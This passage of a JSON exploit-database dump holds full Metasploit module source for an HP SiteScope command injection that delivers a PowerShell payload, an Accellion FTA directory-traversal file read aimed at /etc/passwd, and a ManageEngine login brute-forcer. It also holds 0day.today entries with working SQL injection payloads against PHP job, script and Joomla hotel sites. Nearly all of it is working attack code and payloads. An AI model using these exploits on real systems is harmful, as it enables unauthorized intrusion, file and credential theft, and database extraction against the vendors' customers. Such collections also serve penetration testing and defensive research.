The Linux version is unaffected.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Kirk Hayes', # @kirkphayes / Vulnerability Discovery and MSF module author\n 'Charles Riggs', # c0v3rt_chann3l / Vulnerability Discovery\n 'Juan Vazquez' # help with MSF module\n ],\n 'References' =>\n [\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection'],\n ['URL', 'http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html'] # vendor site\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP SiteScope 11.30 / Microsoft Windows 7 and higher',\n {\n 'Arch' => [ARCH_X64, ARCH_X86]\n }\n ],\n [ 'HP SiteScope 11.30 / CMD',\n {\n 'Arch' => [ARCH_CMD]\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 9 2015'))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('SITE_SCOPE_USER', [false, 'Username for authentication', '']),\n OptString.new('SITE_SCOPE_PASSWORD', [false, 'Password for authentication', '']),\n OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])\n ])\n end\n\n def exploit\n initial_session = get_initial_session_id\n redirect = authenticate(initial_session)\n session = get_authenticated_session_id(initial_session, redirect)\n csrf_token = get_csrf_token(session)\n\n print_status(\"Executing payload\")\n random_mark = Rex::Text.rand_text_alpha(5 + rand(5))\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path.to_s, 'remoteProxy'),\n 'method' => 'POST',\n 'vars_get' => {\n 'OWASP_CSRFTOKEN' => csrf_token\n },\n 'cookie' => session,\n 'ctype' => 'application/octet- serializable object',\n 'data' => build_stream(random_mark)\n }, 5)\n\n if res && res.code == 200 && res.body\n res_io = StringIO.new(res.body.to_s)\n res_stream = Rex::Java::Serialization::Model::Stream.decode(res_io)\n return if res_stream.nil?\n show = false\n res_stream.references.each do |ref|\n if ref.class == 
Rex::Java::Serialization::Model::Utf && show\n print_good(ref.contents)\n next\n elsif ref.class == Rex::Java::Serialization::Model::Utf && ref.contents.include?(random_mark)\n show = true\n next\n end\n end\n end\n end\n\n def get_initial_session_id\n print_status(\"Retrieving an initial JSESSIONID...\")\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path.to_s, 'servlet', 'Main'),\n 'method' => 'POST'\n )\n\n if res and res.code == 200 and res.get_cookies.include?('JSESSIONID')\n session_id = res.get_cookies\n else\n fail_with(Failure::Unknown, \"#{peer} - Retrieve of initial JSESSIONID failed\")\n end\n\n session_id\n end\n\n def authenticate(session_id)\n print_status(\"Authenticating on HP SiteScope Configuration...\")\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path.to_s, 'j_security_check'),\n 'method' => 'POST',\n 'cookie' => session_id,\n 'vars_post' => {\n 'j_username' => datastore['SITE_SCOPE_USER'],\n 'j_password' => datastore['SITE_SCOPE_PASSWORD']\n }\n })\n\n if res && res.code == 302\n redirect = URI(res.headers['Location']).path\n else\n fail_with(Failure::NoAccess, \"#{peer} - Authentication on SiteScope failed\")\n end\n\n redirect\n end\n\n def get_authenticated_session_id(session_id, redirect)\n print_status(\"Following redirection to finish authentication...\")\n\n res = send_request_cgi(\n {\n 'uri' => redirect,\n 'method' => 'GET',\n 'cookie' => session_id\n })\n\n if res && res.code == 200 && res.get_cookies.include?('JSESSIONID')\n auth_session = res.get_cookies\n else\n fail_with(Failure::NoAccess, \"#{peer} - Authentication on SiteScope failed\")\n end\n\n auth_session\n end\n\n def get_csrf_token(session)\n print_status(\"Getting anti-CSRF token...\")\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path.to_s, 'jsp', 'tabs.jsp'),\n 'cookie' => session\n )\n\n if res && res.code == 302 && res.headers['Location'] =~ /OWASP_CSRFTOKEN=([A-Z0-9\\-]+)/\n csrf_token = $1\n else\n 
fail_with(Failure::Unknown, \"#{peer} - Failed to get anti-CSRF token\")\n end\n\n csrf_token\n end\n\n def build_stream(random_mark)\n site = \"google.com & echo #{random_mark} & \"\n if target.arch.include?('cmd')\n command = payload.encoded\n else\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\n end\n\n file = File.join( Msf::Config.data_directory, 'exploits', 'R7_2015_17', 'stream.raw')\n\n f = File.new(file, 'rb')\n stream = Rex::Java::Serialization::Model::Stream.decode(f)\n f.close\n\n dns_param = stream.references[0x44]\n dns_param.contents = site + command\n dns_param.length = dns_param.contents.length\n\n stream.encode\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_sitescope_dns_tool.rb"}, {"lastseen": "2019-11-18T10:50:14", "bulletinFamily": "exploit", "description": "This module exploits a file disclosure vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'statecode' cookie parameter is appended to a file path that is processed as a HTML template. By prepending this cookie with directory traversal sequence and appending a NULL byte, any file readable by the web user can be exposed. The web user has read access to a number of sensitive files, including the system configuration and files uploaded to the appliance by users. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. 
This issue was fixed in software update FTA_9_11_210.\n", "modified": "2017-07-24T13:26:21", "published": "2015-07-08T18:42:11", "id": "MSF:AUXILIARY/SCANNER/HTTP/ACCELLION_FTA_STATECODE_FILE_READ", "href": "", "type": "metasploit", "title": "Accellion FTA 'statecode' Cookie Arbitrary File Read", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Accellion FTA 'statecode' Cookie Arbitrary File Read\",\n 'Description' => %q{\n This module exploits a file disclosure vulnerability in the Accellion\n File Transfer appliance. This vulnerability is triggered when a user-provided\n 'statecode' cookie parameter is appended to a file path that is processed as\n a HTML template. By prepending this cookie with directory traversal sequence\n and appending a NULL byte, any file readable by the web user can be exposed.\n The web user has read access to a number of sensitive files, including the\n system configuration and files uploaded to the appliance by users.\n This issue was confirmed on version FTA_9_11_200, but may apply to previous\n versions as well. 
This issue was fixed in software update FTA_9_11_210.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://r-7.co/R7-2015-08'],\n ['CVE', '2015-2856']\n ],\n 'DisclosureDate' => 'Jul 10 2015'\n ))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('TARGETURI', [true, 'The URI to request that triggers a call to template()', '/courier/intermediate_login.html']),\n OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),\n ])\n end\n\n def run_host(ip)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => datastore['TARGETURI'],\n 'cookie' => 'statecode=../../../../..' + datastore['FILEPATH'] + '%00',\n })\n\n return if not res\n\n if res.code != 200\n vprint_status(\"#{peer} Unexpected response code: #{res.code} #{res.message}\")\n return\n end\n\n contents = res.body.to_s\n\n # Check for patched versions of the FTA\n if contents =~ / Missing session ID.*Accellion, Inc/m\n print_error(\"#{peer} Appears to be a patched Accellion FTA\")\n return\n end\n\n fname = ::File.basename(datastore['FILEPATH'])\n\n expected_server = \"Apache\"\n expected_expires = 'Mon, 26 Jul 1997 05:00:00 GMT'\n\n # Use hints from the server headers to indicate whether we think this was a valid response\n if res.headers['Server'].to_s == expected_server && res.headers['Expires'].to_s == expected_expires\n path = store_loot(\n 'accellion.fta.file',\n 'application/octet-stream',\n rhost,\n res.body,\n fname\n )\n print_good(\"#{peer} Sucessfully downloaded #{datastore['FILEPATH']} as #{path}\")\n else\n vprint_status(\n \"#{peer} Unexpected response headers: (Server=#{res.headers['Server'].inspect} Expected=#{expected_server.inspect}) \" +\n \"(Expires=#{res.headers['Expires'].inspect} Expected=#{expected_expires.inspect})\"\n )\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb"}, {"lastseen": "2019-12-02T00:29:51", "bulletinFamily": "exploit", "description": "This module will attempt to authenticate to a ManageEngine Desktop Central.\n", "modified": "2019-06-27T22:06:32", "published": "2015-04-08T07:05:56", "id": "MSF:AUXILIARY/SCANNER/HTTP/MANAGEENGINE_DESKTOP_CENTRAL_LOGIN", "href": "", "type": "metasploit", "title": "ManageEngine Desktop Central Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/manageengine_desktop_central'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Login Utility',\n 'Description' => %q{\n This module will attempt to authenticate to a ManageEngine Desktop Central.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'RPORT' => 8020}\n ))\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n\n # Initializes CredentialCollection and ManageEngineDesktopCentral\n def init(ip)\n @cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n @scanner = Metasploit::Framework::LoginScanner::ManageEngineDesktopCentral.new(\n configure_http_login_scanner(\n host: ip,\n port: datastore['RPORT'],\n cred_details: @cred_collection,\n 
stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5,\n http_username: datastore['HttpUsername'],\n http_password: datastore['HttpPassword']\n )\n )\n end\n\n\n # Reports a good login credential\n def do_report(ip, port, result)\n service_data = {\n address: ip,\n port: port,\n service_name: 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n module_fullname: self.fullname,\n origin_type: :service,\n private_data: result.credential.private,\n private_type: :password,\n username: result.credential.public,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n last_attempted_at: DateTime.now,\n status: result.status,\n proof: result.proof\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n # Attempts to login\n def bruteforce(ip)\n @scanner.scan! do |result|\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(:level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\")\n do_report(ip, rport, result)\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(:level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\")\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n end\n end\n end\n\n\n # Start here\n def run_host(ip)\n 
init(ip)\n unless @scanner.check_setup\n print_brute(:level => :error, :ip => ip, :msg => 'Target is not ManageEngine Desktop Central')\n return\n end\n\n bruteforce(ip)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb"}], "zdt": [{"lastseen": "2018-02-14T00:31:08", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-01-28T00:00:00", "published": "2018-01-28T00:00:00", "href": "https://0day.today/exploit/description/29662", "id": "1337DAY-ID-29662", "type": "zdt", "title": "Hot Scripts Clone - subctid SQL Injection Vulnerability", "sourceData": "# # # # # \r\n# Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Vendor Homepage: http://www.phpscriptsmall.com/\r\n# Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# http://localhost/[PATH]/categories?keyword=&mctid=[SQL]&subctid=[SQL]\r\n# \r\n# -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-\r\n# \r\n# # # # #\n\n# 0day.today [2018-02-13] #", "sourceHref": "https://0day.today/exploit/29662", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T03:13:08", "bulletinFamily": "exploit", "description": "Exploit for php 
platform in category web applications", "modified": "2017-12-10T00:00:00", "published": "2017-12-10T00:00:00", "href": "https://0day.today/exploit/description/29166", "id": "1337DAY-ID-29166", "type": "zdt", "title": "Entrepreneur Job Portal Script 2.0.6 - jobsearch_all.php?rid1 SQL Injection Vulnerability", "sourceData": "# Exploit Title: Entrepreneur Job Portal Script 2.0.6 - SQL Injection \r\n # Dork: N/A \r\n # Date: 08.12.2017 \r\n # Vendor Homepage: https://www.phpscriptsmall.com/ \r\n # Software Link: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/ \r\n # Demo: http://freelancewebdesignerchennai.com/demo/job-portal/ \r\n # Version: 2.0.6 \r\n # Category: Webapps \r\n # Tested on: WiN7_x64/KaLiLinuX_x64 \r\n # CVE: N/A \r\n # # # # # \r\n # Exploit Author: Ihsan Sencan \r\n # Author Web: http://ihsan.net \r\n # Author Social: @ihsansencan \r\n # # # # # \r\n # Description: \r\n # The vulnerability allows an attacker to inject sql commands.... \r\n # \r\n # Proof of Concept: \r\n # \r\n # 1) \r\n # http://localhost/[PATH]/jobsearch_all.php?rid1=[SQL] \r\n # \r\n # -1'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+- \r\n # \r\n # \r\n # # # # #\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/29166", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-01T21:39:17", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-02-21T00:00:00", "published": "2017-02-21T00:00:00", "href": 
"https://0day.today/exploit/description/27076", "id": "1337DAY-ID-27076", "title": "Joomla J-HotelPortal 6.0.2 Component - review_id Parameter SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # # # \r\n# Exploit Title: Joomla! Component J-HotelPortal v6.0.2 - SQL Injection\r\n# Google Dork: inurl:index.php?option=com_jhotelreservation\r\n# Date: 21.02.2017\r\n# Vendor Homepage: http://www.cmsjunkie.com/\r\n# Software Buy: http://www.cmsjunkie.com/joomla-hotel-portal\r\n# Demo: http://hoteldemo.cmsjunkie.com/j3/portal/\r\n# Version: 6.0.2\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail : ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]\r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27076"}]}